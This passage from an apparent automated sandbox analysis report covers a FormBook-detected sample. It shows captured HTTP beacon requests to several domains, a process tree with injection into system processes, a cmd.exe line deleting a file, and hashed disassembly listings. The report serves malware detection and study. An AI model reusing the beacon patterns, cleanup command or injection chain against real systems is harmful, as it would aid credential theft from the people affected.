0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou
May 12, 2021 08:42:25.841398954 CEST	6175	IN	Data Raw: 6e 64 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 66 66 38 61 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 38 22 20 2f 3e 0a 20 20 20 20 3c 74 65 78 74 20 78 3d 22 34 32 22 20 79 3d 22 37 34 22 20 66 69 6c Data Ascii: nd" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text> </svg> <div class="row"> <div class="col-md-12"> <div class="main-i

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49748	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:41.199654102 CEST	6194	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1 Host: www.albanyhumanesociety.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:41.336272955 CEST	6195	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 06:42:41 GMT Content-Type: text/html Content-Length: 275 ETag: "60995c26-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49749	198.54.117.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:51.992958069 CEST	6196	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1 Host: www.sandybottomsflipflops.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 00098765123POIIU.exe PID: 6396 Parent PID: 5908

General

Start time:	08:40:47
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\00098765123POIIU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\00098765123POIIU.exe'
Imagebase:	0xe50000
File size:	968192 bytes
MD5 hash:	4E2D6AB0C9A56AEE76BA33BD26DCE9B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 6572 Parent PID: 6396

General

Start time:	08:40:51
Start date:	12/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x5a0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 6572

General

Start time:	08:40:53
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 6920 Parent PID: 3440

General

Start time:	08:41:08
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x380000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6940 Parent PID: 6920

General

Start time:	08:41:12
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6948 Parent PID: 6940

General

Start time:	08:41:12
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 00098765123POIIU.exe PID: 6396 Parent PID: 5908 00098765123POIIU.exeCOMMON

Executed Functions

Function 057D6EF8, Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

/~Zw, xrefs: 057D6FD5

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID: /~Zw
API String ID: 0-156202095
Opcode ID: f9ebb8f3708f8d9ba4111a12baf02e7785b423d481df02a81167080ffc505f84
Instruction ID: 5197478258444d065aa97816fcdde78ec87b21ea86020214756c4973071920c3
Opcode Fuzzy Hash: f9ebb8f3708f8d9ba4111a12baf02e7785b423d481df02a81167080ffc505f84
Instruction Fuzzy Hash: 46727B31A142298FCB14CF69D884AADBBF3FF89304F25C569E406EB255D734A941DB60

Uniqueness

Uniqueness Score: -1.00%

Function 057D6F50, Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

/~Zw, xrefs: 057D6FD5

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID: /~Zw
API String ID: 0-156202095
Opcode ID: c5a1a634fa5e25021e1814f5c2132892ad52934e801250c22d7f1a4fd6187d73
Instruction ID: ea50c34a6d06d8252c1eaa04dde5e7773df8c668352dc83183193af2eadcb5bd
Opcode Fuzzy Hash: c5a1a634fa5e25021e1814f5c2132892ad52934e801250c22d7f1a4fd6187d73
Instruction Fuzzy Hash: 11D19E71A106298FDB24CF69D884AAEB7F3FF88304F21C569E406EB354DB3499418B91

Uniqueness

Uniqueness Score: -1.00%

Function 057D6F95, Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

/~Zw, xrefs: 057D6FD5

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID: /~Zw
API String ID: 0-156202095
Opcode ID: b0175c5bf53a691ae8920bc6c87731d4d8a372bbc9a292a7ed155df934743122
Instruction ID: c37325ee772057af35b6d993bb7a90d9da0a88c3777e08b102f7d14e2226c7d9
Opcode Fuzzy Hash: b0175c5bf53a691ae8920bc6c87731d4d8a372bbc9a292a7ed155df934743122
Instruction Fuzzy Hash: CAC18D35A106198FDB24CF69D884AAEB7F3FF88304F21C569E406EB354DB34AD418B91

Uniqueness

Uniqueness Score: -1.00%

Function 057D4418, Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe038e29b888f234827ab73e2f3852e1a15127cbb10d0fe96b4ea1e59de7172
Instruction ID: a6bbf3274eebfbe6fa0e7e0af3bb862140f816524706ff43ce5dce904aac3c09
Opcode Fuzzy Hash: cbe038e29b888f234827ab73e2f3852e1a15127cbb10d0fe96b4ea1e59de7172
Instruction Fuzzy Hash: CE12B334B006048FCB18EF79C498AADB7F2BF89704B1585B9E50AEB371DB369C459B50

Uniqueness

Uniqueness Score: -1.00%

Function 057DA608, Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a70694cf0f4bf28a8701e25f4bc17d58dd4b695efbe2098d1e7da771c8ca87
Instruction ID: 8076e6281f6ec4c843f3ab22a6fe671ea7db5f2177588ea81fdc83abc7c74b04
Opcode Fuzzy Hash: 70a70694cf0f4bf28a8701e25f4bc17d58dd4b695efbe2098d1e7da771c8ca87
Instruction Fuzzy Hash: E612C334B006048FCB18EF79C498AADB7F2BF89604B1585B9E50ADB371DB369C45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0310B15C, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d787de368a0a3da1a7fd9daf875220ae553965ddbc97a8770293967f3092ab
Instruction ID: 36a2a60ca980eb5c90703487196c0ab8b878f6edecfe05aada211c364f62e3c3
Opcode Fuzzy Hash: 18d787de368a0a3da1a7fd9daf875220ae553965ddbc97a8770293967f3092ab
Instruction Fuzzy Hash: 3691B035E00319DFCB04DBE4D8549DDBBBAFF89304F248619E416AB3A4EB70A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 057D6B70, Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81e22e496793379dd1e1486e77c4af6fc15457866c6d1369d9da44275f58d8d
Instruction ID: 4654b1596486ad9786cc4b2ef61b40b1c5be0fa64bce773be8736f70a5645d0f
Opcode Fuzzy Hash: c81e22e496793379dd1e1486e77c4af6fc15457866c6d1369d9da44275f58d8d
Instruction Fuzzy Hash: D681F7B8E4011E9FDF54CFA9D484AAEBBB1FB48304F10A659D406EB254DB31AA05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0310DE90, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6786663330e7b9c0b69953899e337881789e053a1602e2ad95cc0c3aff5ab444
Instruction ID: d320377d11b56225c7a328171b6f48978fc77847a8a803ba7d0cf6dfffda927d
Opcode Fuzzy Hash: 6786663330e7b9c0b69953899e337881789e053a1602e2ad95cc0c3aff5ab444
Instruction Fuzzy Hash: A5818E75E00319DFCB04DBE1E8548DDBBBAFF89310F248619E415AB7A4EB70A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0310B08F, Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eba4b4cf292ea25d734daf0afe8bf164febc35710eea596ef77b33ce4d8a6c1
Instruction ID: 72e87fcea141e5cae4d610219dd3eeba24cfb350208d15d7283385023ed13853
Opcode Fuzzy Hash: 4eba4b4cf292ea25d734daf0afe8bf164febc35710eea596ef77b33ce4d8a6c1
Instruction Fuzzy Hash: 718165B1C083489FCB10CFA9D984ADEBFB1BF49314F15815AE419AB281D7B4A884CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0310BAD8, Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0310BD2E

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b04583f84a5105d11e213763c4fdb8642d7a0d7cf5a0e48202768c1a308a37ed
Instruction ID: 54e65690b6775569b47b19e2acc3cac6a4fa4e17205a7873336cbd714f97c9ad
Opcode Fuzzy Hash: b04583f84a5105d11e213763c4fdb8642d7a0d7cf5a0e48202768c1a308a37ed
Instruction Fuzzy Hash: 02715570A04B058FD724DF6AD45079ABBF5FF88204F048A2ED486DBB80DBB4E9458F91

Uniqueness

Uniqueness Score: -1.00%

Function 0310DB38, Relevance: 1.7, APIs: 1, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c65c16abf9405aa7251834da3c55f1163dc47ba3929f11984cc671baa7fb2db
Instruction ID: 9c2c8a026a7132bdbb53ad8810abe2a608643368bd284af91b0c9f871bce62ee
Opcode Fuzzy Hash: 3c65c16abf9405aa7251834da3c55f1163dc47ba3929f11984cc671baa7fb2db
Instruction Fuzzy Hash: 63511171C04348AFCF15CFA9D984ADDBFB6BF49310F14816AE818AB261D7B19885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0310B10C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0310DCAA

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a0607063538d5a7cc5bf54fcd988a455d4614282ae9da77add9a89eba87cbb45
Instruction ID: 2954c109ab6bbd70f5ee8f6f0d309c2b6edee9754904b9b92e36ca937810d1c1
Opcode Fuzzy Hash: a0607063538d5a7cc5bf54fcd988a455d4614282ae9da77add9a89eba87cbb45
Instruction Fuzzy Hash: D951DFB1D003489FDB14CF99D984ADEBBB5BF48310F24812AE819AB250D7B49985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0310DB8D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0310DCAA

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 32211d5b942ba0382777da6ac69fa8ed8a0ba3ab31a7f07f07e7986a4606b527
Instruction ID: 5c2b372d26b645e70eea48bec36b3d5eb3899c27611d16b7b0b0bfcc3fbe4d4e
Opcode Fuzzy Hash: 32211d5b942ba0382777da6ac69fa8ed8a0ba3ab31a7f07f07e7986a4606b527
Instruction Fuzzy Hash: F951CFB1D00348DFDF14CFA9D984ADEBBB5BF48314F24812AE819AB250D7B49985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 057D1E9C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 057D3EF9

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4d40dbe85f29b779a9f8963f8a02a9889abcdcc70a63ecf5ea8ba4ce9bf280aa
Instruction ID: 2ae4377bf213ad2285795680d60887549128eb6016ebc46fac63fd09b87d6231
Opcode Fuzzy Hash: 4d40dbe85f29b779a9f8963f8a02a9889abcdcc70a63ecf5ea8ba4ce9bf280aa
Instruction Fuzzy Hash: B84102B1C0462DCBDB20CFA9C8847DEFBB5BF48304F208469D408AB251DBB95946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 057D0CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 057D0D91

Memory Dump Source

Source File: 00000000.00000002.342513768.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6ad3fd75d3383926cc1b8573b1073ae55ef0210cc24c5eac7a61dd4080a1fcd7
Instruction ID: 20d5d3e084c636e0bddee3c415f41092bf2f1ba388e1667de24f9bc4a52f30ad
Opcode Fuzzy Hash: 6ad3fd75d3383926cc1b8573b1073ae55ef0210cc24c5eac7a61dd4080a1fcd7
Instruction Fuzzy Hash: 354147B9A003159FCB10CF99C488AAAFBF5FF89314F25C459D519AB321E374A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03106CDB, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03106D67

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a77f726d3e4a5904c3c9f01c6fe9c8ff8c39962e2bf0fa275059d7a77dee2905
Instruction ID: 1866da2eba31c1fffe346e909cc32b979a5a9729e37ce654c47b9168d5ba4e13
Opcode Fuzzy Hash: a77f726d3e4a5904c3c9f01c6fe9c8ff8c39962e2bf0fa275059d7a77dee2905
Instruction Fuzzy Hash: 1B21E3B59002489FDB10CFA9D984AEEBBF8FB48320F14801AE914B7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03106CE0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03106D67

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9bce4bebc14714896cc01d584a394ed20605b074ce7699e55a1c11c4f92f4ce5
Instruction ID: 6265f3b78cca9d8c7e860d836a46ee259eb11d0a099ff1d1d6091b5c9108dfd1
Opcode Fuzzy Hash: 9bce4bebc14714896cc01d584a394ed20605b074ce7699e55a1c11c4f92f4ce5
Instruction Fuzzy Hash: DD21E4B59002489FDB10CFA9D984ADEBBF8FF48320F14801AE914B7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0310AFD0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0310BDA9,00000800,00000000,00000000), ref: 0310BFBA

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 39513c3250f4d5f15b6b721844aa4b2a7368a4409c2af3ec7955a1e65f75c29b
Instruction ID: 1caf2ca631b7e6516c9ca09352fc93eaa058e835eea52b986729f6429221dabb
Opcode Fuzzy Hash: 39513c3250f4d5f15b6b721844aa4b2a7368a4409c2af3ec7955a1e65f75c29b
Instruction Fuzzy Hash: 8F1114B29042089FCB10CF9AD944BDEFBF4EB49310F05842AE519B7240C7B4A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0310BF49, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0310BDA9,00000800,00000000,00000000), ref: 0310BFBA

Memory Dump Source

Source File: 00000000.00000002.337695230.0000000003100000.00000040.00000001.sdmp, Offset: 03100000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 42cb1b6213f2d14946338379bc2abd905cb49f8bcdee86ab1bf7191d1916ff32
Instruction ID: fdcc4a80ebb2486817cbb086f9ae76b196061b9a1238db4fa84149c7b13f5a33
Opcode Fuzzy Hash: 42cb1b6213f2d14946338379bc2abd905cb49f8bcdee86ab1bf7191d1916ff32
